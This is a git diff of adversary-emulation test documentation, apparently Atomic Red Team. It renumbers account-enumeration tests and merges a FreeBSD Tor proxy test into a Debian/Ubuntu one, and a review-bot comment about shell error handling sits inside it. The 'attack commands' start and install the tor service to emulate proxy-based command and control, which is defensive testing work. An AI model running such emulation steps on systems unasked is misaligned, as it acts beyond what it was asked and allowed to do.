-## Atomic Test #10 - Enumerate all accounts via PowerShell (Local)
+## Atomic Test #9 - Enumerate all accounts via PowerShell (Local)
 Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed. **Supported Platforms:** Windows
@@ -405,7 +366,7 @@ net localgroup

-## Atomic Test #11 - Enumerate logged on users via CMD (Local)
+## Atomic Test #10 - Enumerate logged on users via CMD (Local)
 Enumerate logged on users. Upon execution, logged on users will be displayed. **Supported Platforms:** Windows
diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md
index 20ff12f68..19e6735f3 100644
--- a/atomics/T1090.003/T1090.003.md
+++ b/atomics/T1090.003/T1090.003.md
@@ -10,12 +10,10 @@ In the case of network infrastructure, particularly routers, it is possible for
 - [Atomic Test #2 - Tor Proxy Usage - Windows](#atomic-test-2---tor-proxy-usage---windows)
-- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu](#atomic-test-3---tor-proxy-usage---debianubuntu)
+- [Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD](#atomic-test-3---tor-proxy-usage---debianubuntufreebsd)
 - [Atomic Test #4 - Tor Proxy Usage - MacOS](#atomic-test-4---tor-proxy-usage---macos)
-- [Atomic Test #5 - Tor Proxy Usage - FreeBSD](#atomic-test-5---tor-proxy-usage---freebsd)
-
@@ -142,7 +140,7 @@ expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -D

-## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu
+## Atomic Test #3 - Tor Proxy Usage - Debian/Ubuntu/FreeBSD
 This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched.
@@ -160,12 +158,12 @@ Upon successful execution, the tor proxy service will be launched.
 ```sh
-sudo systemctl start tor
+[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor
 ```
 #### Cleanup Commands:
 ```sh
-sudo systemctl stop tor
+[ "$(uname)" = 'FreeBSD' ] && service tor stop && sysrc -x tor_enable || sudo systemctl stop tor
 ```
@@ -178,7 +176,7 @@ if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-sudo apt-get -y install tor
+(which apt && sudo apt-get -y install tor) || (which pkg && pkg install -y tor)
 ```
@@ -230,51 +228,4 @@ brew install tor
-
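Review bot: The new attack command in hunk @@ -160, `[ "$(uname)" = 'FreeBSD' ] && sysrc tor_enable="YES" && service tor start || sudo systemctl start tor`, uses `a && b || c` as an if/else, so on FreeBSD a failing `sysrc` or `service tor start` (e.g. when not run as root) falls through into the Linux branch and runs `sudo systemctl start tor`, which then fails with an unrelated error that masks the real one; the cleanup command in the same hunk and the `(which apt && ...) || (which pkg && ...)` line in hunk @@ -178 have the same shape, where a failed `apt-get` silently moves on to the `pkg` branch. The Linux branches also invoke `sudo` while the FreeBSD branches (`sysrc`, `service`, `pkg install -y tor`) do not, which presumably relies on the test's elevation requirement but is inconsistent within one command. An explicit `if`/`else` keeps each failure inside its own platform branch; the cleanup and prereq commands should be restructured the same way.

```sh
if [ "$(uname)" = 'FreeBSD' ]; then
  sysrc tor_enable="YES" && service tor start
else
  sudo systemctl start tor
fi
```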
-
- -## Atomic Test #5 - Tor Proxy Usage - FreeBSD -This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. -Upon successful execution, the tor proxy service will be launched. - -**Supported Platforms:** Linux - - -**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a - - - - - - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) - - -```sh -sysrc tor_enable="YES" -service tor start -``` - -#### Cleanup Commands: -```sh -service tor stop -sysrc -x tor_enable -``` - - - -#### Dependencies: Run with `sh`! -##### Description: Tor must be installed on the machine -##### Check Prereq Commands: -```sh -if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi -``` -##### Get Prereq Commands: -```sh -pkg install -y tor -``` - - - -